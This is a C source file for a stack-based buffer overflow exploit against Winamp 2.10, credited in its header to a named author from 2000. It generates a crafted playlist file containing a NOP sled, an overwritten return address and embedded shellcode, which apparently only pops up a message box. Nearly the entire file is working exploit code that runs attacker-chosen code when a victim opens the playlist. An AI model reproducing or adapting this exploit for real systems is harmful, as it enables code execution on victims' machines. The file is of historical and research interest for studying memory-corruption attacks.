/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>

int main()
{
  printf("\n\n\t\t.......................................\n");
  printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
  printf("\t\t.......................................\n");
  printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
  printf("\t\t.........http://indigo.ie/~lmf.........\n");
  printf("\t\t.......................................\n\n");

  char buffer[640];
  char eip[8] = "\xF7\xCF\xB9\xBF";
  char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
                     "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
                     "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50"
                     "\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
                     "\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF"
                     "\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

  FILE *file;

  for(int x=0;x<580;x++)
    {
      buffer[x] = 0x90;
    }

  file = fopen("crAsh.pls","wb");
  fprintf(file, "[playlist]\n");
  fprintf(file, "File1=");
  fprintf(file, "%s", buffer);
  fprintf(file, "%s", eip);
  fprintf(file, "%s", sploit);
  fprintf(file, "\nNumberOfEntries=1");

  fclose(file);
  printf("\t created file crAsh.pls loaded with the exploit.\n");
  return 0;
}